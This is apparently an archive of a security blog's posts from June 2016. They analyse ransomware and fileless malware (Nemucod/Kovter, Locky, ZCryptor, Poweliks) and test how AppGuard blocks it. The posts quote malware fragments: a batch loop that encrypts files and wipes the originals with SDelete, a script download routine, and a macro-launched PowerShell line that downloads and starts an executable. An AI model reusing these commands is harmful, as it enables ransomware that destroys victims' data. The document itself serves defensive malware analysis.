Monthly Archives: June 2016

Developers of Ransomware JS/Nemucod.FG and Kovter take security seriously

25 June 2016

Ransomware Kovter is delivered e.g. through a malicious email attachment named Court_Notification_0000928697.doc.js. The developers of this script take security really serious.

The script downloads encryption programs from a list of malicious sites. It then calls the windows command shell and loops through every fixed and network drive in its search for files to be encrypted. The command below shows a code fragment for the encryption of files stored on drive C:

for /r "C:\" %i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.do ... ) do (
      (ECHO "%~pi" | FINDSTR /I "appdata application ... " 1>NUL)) ||
      (if %~zi LSS 10000000 if %~zi GTR 10000 (
(1)          call %TEMP%\a1.exe -mx0 -mhe -p"<Encryption Key>" "%i.crypted" "%i"
(2)          Delete %i
             ECHO %i >>"%TEMP%\a.log"

The encryption program a1.exe (1) creates an encrypted copy with extension crypted, In the next step the script deletes (2) the original file.

The Delete command is somewhat special in this case. The script downloads the program Sdelete from Windows Sysinternals and stores the downloaded file in %TEMP%\a9.exe:"GET","https:´//", false); 
if(xa.size>100000) { xa.saveToFile(%TEMP%\a9.exe",2);};

If the download is successful command a9.exe -a -q is used to delete the original file.

From the Sysinternals homepage one learns that

SDelete implements the Department of Defense clearing and sanitizing standard DOD 5220.22-M, to give you confidence that once deleted with SDelete, your file data is gone forever.

With this it is not possible to recover the deleted files with disk utilities or with the help of a data rescue lab.

Fortunately, the encryption programs are downloaded to User Space. Within the download loop the developer checks whether the program can be executed on the system. Since the program is executed from User Space AppGuard blocks the execution and prevents the script from starting the main loop over all drives and about 80 file types:

AppGuard stops A2.exe

AppGuard stops A2.exe

Appguard stops A1.exe

AppGuard stops A1.exe

In this case the java script loads two encryption programs from the attacker’s download servers. A2.exe is identified as Trojan:Win32/Dynamer!ac (Microsoft) or (McAfee Gateway Edition), A1.exe as Trojan:Win32/Kovter!rfn (Microsoft) or Trojan-FIMO!571F44310A86 (McAfee Gateway Edition). The script is identified as TrojanDownloader:JS/Nemucod.FG (Microsoft) or JS/ (McAfee Gateway Edition).

Take care! And have a good weekend.

AppGuard protection concepts II

19 June 2016

Preventing the execution of whatever scripts or executables from User Space is one of the basic security concepts of AppGuard. Unfortunately, the User Space concept does not work in the case of fileless malware. A very prominent representative of this malware type is Poweliks.  Poweliks was first detected in August 2014. It hides its payload in the Windows registry, no file is written during the first infection phase.

In the McAfee Labs Threats Report: November 2015 McAfee researchers described in detail how the fileless Kovter malware infects a victim’s system. Kovter writes JavaScript to the registry. This script calls an encrypted PowerShell Script which is also stored in the registry. Finally, the code is written to the memory of another process and executed within the context of this memory.

During this last write process AppGuard’s MemoryGuard enters the game:

Memory protection is designed to prevent one process (originator) from altering or reading the memory of another process (target). Attackers try to re-allocate memory, place executable code into the newly allocated memory, and then execute this code. This type of attack is known as memory code injection and memory scraping. This attack has been widely used in file-less malware which exists only in memory, and Trojan downloader type of malware.

Sound’s easy. Again, ProcessExplorer is the perfect means to show how MemoryGuard works:

Process Explorer: User Process Tree Unprotected

Process Explorer: User Process Tree Unprotected

Process Explorer: User Process Tree in Protected Mode

Process Explorer: User Process Tree in Protected Mode

In Protected mode icons and process descriptions are no longer displayed. Process Explorer retrieves these details from the process memory, and MemoryGuard blocks read access.

Process Explorer: Regedit Process Details Unprotected

Process Explorer: Process Details Unprotected

Process Explorer: Regedit Process Details Protected

Process Explorer: Process Details Protected

In Protected mode important process details are no longer displayed. Process Explorer reads these details from a process’ memory and displays them in the Properties dialogue. If AppGuard is operated in the default mode Protected, MemoryGuard blocks this reading operations, thus details about the process cannot be retrieved.

MemoryGuard is a really charming concept, and out-of-the-box available after installation.

Have a good weekend.

New developments in the field of ransomware

11 June 2016

During my test of AppGuard some new variants of ransomware showed up in the wild.

ReaQta reported a new and massive worldwide Locky ransomware spam campaign. The new variant downloads the payload in encrypted form from the attacker’s command and control server and decrypts it before execution on the victim’s system. This makes it harder for traditional anti-malware systems to identify the payload as malicious.

Since the decrypted version is executed from User Space AppGuard blocks the execution.

Microsoft reported a new variant called ZCryptor which behaves like a worm:

‘ZCryptor can initially infect targets through traditional phishing schemes, macros or fake installers, but also has the ability to place autorun files on removable storage devices. can initially infect targets through traditional phishing schemes, macros or fake installers, but also has the ability to place autorun files on removable storage devices. This means the ransomware can spread itself to other machines on portable storage devices, rather than relying on more targets to fall victim to phishing, according to Microsoft’s security advisory.’

I had to deactivate all Windows 10 security features on my test system to download the malware sample from to the User Space of my account:

Timestamp MD5 File Name File Type Antivirus
May 27, 2016, 6:43 p.m. d1e75b274211a78d9c5d38c8ff2e1778 zcrypt.ex_ PE32 executable (GUI) Intel 80386, for MS Windows 39/57

AppGuard runs out-of-the-box in protection mode Protected with default User Space settings.

Again, AppGuard blocked the execution of z_crypt.exe, thus prevented the malware from becoming persistent and from encrypting my documents:

AppGuard stops ZCryptor

AppGuard stops ZCryptor

Even if one receives ZCryptor on a portable device AppGuard will block the execution due to the default Removable Media rule:

AppGuard Removable Media default rule

AppGuard Removable Media default rule

More about AppGuard next week.

Have a good weekend.

AppGuard protection concepts I

4 June 2016

Sysinternals Process Explorer is one of my favorite tools. And the best tool to gain an insight into the operations of Blue Ridge Networks AppGuard.

Process Explorer process tree

Process Explorer process tree

Process Explorer process tree

Process Explorer process tree details

When Process Explorer starts in Windows 10 (64 bit Version) the process is started as a child process of the user’s Explorer process. This start process extracts the 64 bit version of Process Explorer to the local temporary files directory  C:\users\kjochem\AppData\Local\Temp\procexp64.exe and runs the 64 bit version from this directory.

Modern Windows operating systems protect themselves against unintentional changes by users. They restrict change access of users to few directories, e.g. to directory C:\users\<username> in the so-called User Space and prevent write access to the System Space, e.g. C:\windows\system32, unless the user does not work with administrative privileges permanently.

When a user opens a weaponized Word document the Word application is executed in User Space. Thus the Word macro can write commands for the download of malicious content from the attacker’s command & control server to the User Space only. And downloads must be stored in User Space, and thus executed from User Space.

The script below shows how state-of-the-Art malware works. The commands are created by the AutoOpen macro in Word document 839482-Invoice-April.docm, which is identified as e.g. TrojanDownloader.Agent.BEO by ESET-NOD32, W97M.Downloader by Symantec, or WIN32/Spursint.A!cl by Windows Defender.

C:\WINDOWS\system32\cmd.exe /c PowerShell -ExecutionPolicy bypass -noprofile
-windowstyle hidden (New-Object System.Net.WebClient).DownloadFile
 (1) ('','%APPDATA%\MicrosoftLan.exe');
 (2) Start-Process '%APPDATA%\MicrosoftLan.exe'

In this example the (1) andax.exe is downloaded to the user’s APPDATA directory and started (2) from the APPDATA directory afterwards. Shell Variable APPDATA expands on evaluation to C:\users\kjochem\AppData\Roaming.

The same holds for Drive-by Downloads. In the absence of write access outside the User Space the payload of Drive-by Downloads is stored in and executed from User Space.

AppGuard blocks such attacks by preventing the execution of suspicious programs from User space. Quite simple, but very effective.

After installation the default User Space settings already ensure a high level of protection:

AppGuard default User Space Protecion

AppGuard default User Space Protection

In Locked Down mode AppGuard blocks the execution of programs from User Space. With this, the execution of Process Explorer is blocked because program procexp64.exe is executed from a subdirectory of User Space:

AppGuard Blocks Process Explorer

AppGuard Blocks Process Explorer

Process Explorer Error Message

Process Explorer Error Message

Quite simple, but very effective. More about the protection concept of AppGuard next week …

Have a good weekend.